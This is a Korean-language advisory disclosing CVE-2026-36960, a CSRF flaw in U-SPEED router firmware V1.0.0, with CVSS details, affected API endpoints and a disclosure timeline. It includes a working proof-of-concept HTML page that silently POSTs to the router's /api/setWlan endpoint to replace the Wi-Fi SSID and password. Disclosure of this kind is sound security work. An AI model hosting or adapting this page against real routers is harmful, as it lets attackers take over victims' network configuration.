
CVE-2026-36960에 대한 개념 증명 익스플로잇으로, U-SPEED 라우터 펌웨어의 CSRF 취약점으로 인해 위조된 요청을 통해 무단 구성 변경이 가능합니다.
CVE ID: CVE-2026-36960 날짜: 2026-04-29 발견자: Kirubel Solomne 공급업체: U-SPEED 제품: U-SPEED 라우터 펌웨어 버전: V1.0.0 CWE: CWE-352 - 사이트 간 요청 위조(CSRF)
U-SPEED 라우터 펌웨어 V1.0.0은 관리 API 엔드포인트에 대해 CSRF 보호 메커니즘(예: CSRF 방지 토큰 또는 엄격한 Origin/Referer 검증)을 구현하지 않습니다. 공격자는 구성 엔드포인트에 위조된 HTTP 요청을 보내는 악성 웹페이지를 제작할 수 있습니다. 인증된 관리자가 해당 악성 웹페이지를 방문하면 라우터는 이 요청을 합법적인 관리 작업으로 처리합니다.
CVSS v3.1 점수: 8.8 (높음)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| 지표 | 값 |
|---|
| 공격 경로 | 네트워크 |
| 공격 복잡성 | 낮음 |
| 필요한 권한 | 없음 |
| 사용자 상호작용 | 필요 |
| 기밀성 영향 | 높음 |
| 무결성 영향 | 높음 |
| 가용성 영향 | 높음 |
| 엔드포인트 | 기능 |
|---|---|
/api/setWlan | 무선 네트워크 구성 |
/api/telnet | Telnet 서비스 구성 |
| 기타 구성 엔드포인트 | 다양한 관리 기능 |
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
예상 동작: CSRF 토큰이 없으므로 요청이 거부되어야 합니다. 실제 동작: 라우터가 위조된 요청을 수락하고 처리합니다.
| 날짜 | 이벤트 |
|---|---|
| 2026-04-29 | 취약점 발견 |
| 2026-04-29 | MITRE에 보고 |
| 2026-04-29 | CVE-2026-36960 배정 |
| 2026-04-29 | 공개 공개 |